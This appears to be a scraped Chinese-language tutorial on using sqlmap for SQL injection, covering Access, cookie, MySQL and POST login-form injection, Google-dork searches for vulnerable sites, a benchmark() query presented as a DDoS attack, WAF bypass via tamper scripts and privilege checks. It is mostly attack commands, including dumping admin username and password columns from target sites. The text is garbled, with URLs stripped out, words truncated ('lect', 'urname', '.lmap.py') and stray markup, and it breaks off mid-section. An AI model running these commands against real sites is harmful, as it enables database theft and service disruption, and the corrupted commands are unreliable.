SQLMAP注⼊教程-11种常见SQLMAP使⽤⽅法详解⼀、SQLMAP⽤于Access数据库注⼊
(1) 猜解是否能注⼊
1 2win:python sqlmap.py -u "" Linux :.lmap.py -u ""
(2) 猜解表
1 2win:python sqlmap.py -u ""--tables Linux:.lmap.py -u ""--tables
(3) 根据猜解的表进⾏猜解表的字段(假如通过2得到了admin这个表)
1 2win:python sqlmap.py -u ""--columns -T admin Linux:.lmap.py -u ""--columns -T admin
(4) 根据字段猜解内容(假如通过3得到字段为urname和password)
1 2 3win:python sqlmap.py -u ""--dump -T admin -C "urname,password" Linux:.lmap.py -u ""--dump -T admin -C
"urname,[url=]B[/url]password"
⼆、SQLMAP⽤于Cookie注⼊
(1) cookie注⼊,猜解表
1win :python sqlmap.py -u ""--cookie "id=31" --table --level 2 (2) 猜解字段,(通过1的表猜解字段,假如表为admin)
1 2win :python sqlmap.py -u ""--cookie "id=31" --columns -T admin --level 2
(3) 猜解内容
1 2win :python sqlmap.py -u ""--cookie "id=31" --dump -T admin -C "urname,password"--level 2
三、SQLMAP⽤于mysql中DDOS攻击(1) 获取⼀个Shell
1 2 3 4win:
python sqlmap.py -u [url]192.168.159.1/news.php?id=1[/url] --sql-shell Linux:
sqlmap -u [url]192.168.159.1/news.php?id=1[/url] --sql-shell
(2) 输⼊执⾏语句完成DDOS攻击
1lect benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
四、SQLMAP⽤于mysql注⼊
(1) 查找数据库
1python sqlmap.py -u ""--dbs
(2) 通过第⼀步的数据库查找表(假如数据库名为dataname)
1python sqlmap.py -u ""-D dataname --tables
(3) 通过2中的表得出列名(假如表为table_name)
1python sqlmap.py -u ""-D dataname -T table_name --columns
(4) 获取字段的值(假如扫描出id,ur,password字段)
1 2python sqlmap.py -u ""-D dataname -T table_name -C "id,ur,password"--dump
五、SQLMAP中post登陆框注⼊
(1) 其中的是通过抓包⼯具burp suite抓到的包并把数据保存为这个txt⽂件
我们在使⽤Sqlmap进⾏post型注⼊时,经常会出现请求遗漏导致注⼊失败的情况。这⾥分享⼀个⼩技巧,即结合burpsuite来使⽤sqlmap,⽤这种⽅法进⾏post注⼊测试会更准确,操作起来也⾮常容易。
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 这时候Burp会拦截到了我们的登录POST请求
5. 把这个post请求复制为txt, 我这命名为 然后把它放⾄sqlmap⽬录下
6. 运⾏sqlmap并使⽤如下命令:
1./sqlmap.py - -p tfUPass
这⾥参数-r 是让sqlmap加载我们的post请求,⽽-p ⼤家应该⽐较熟悉,指定注⼊⽤的参数。
⼏种注⼊⽅式:./sqlmap.py - -p tfUPass
(2) ⾃动的搜索
1sqlmap -u [url]/Login.asp[/url] --forms
(3) 指定参数搜索
1sqlmap -u [url]/Login.asp[/url] --data "tfUName=321&tfUPass=321"
六、SQLMAP中Google搜索注⼊
inurl后⾯的语⾔是由⾃⼰定的
注⼊过程中如果选y是注⼊,如果不是选n
1sqlmap -g inurl:php?id=
七、SQLMAP中的请求延迟
参数 --delay --safe-freq
1 2python sqlmap.py --dbs -u "" --delay 1 python sqlmap.py --dbs -u "" --safe-freq 3
参数
⼋、SQLMAP绕过WAF防⽕墙
1sqlmap -u [url]192.168.159.1/news.php?id=1[/url] -v 3--dbs --batch --tamper "space2morehash.py"
space2morehash.py中可以替换space2hash.py或者ba64encode.py或者charencode.py
都是编码⽅式
space2hash.py ba64encode.py charencode.py
九、SQLMAP查看权限
1sqlmap -u [url]192.168.159.1/news.php?id=1[/url] --privileges
⼗、SQLMAP伪静态注⼊(1) 查找数据库
1python sqlmap.py -u ""--dbs
(2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)
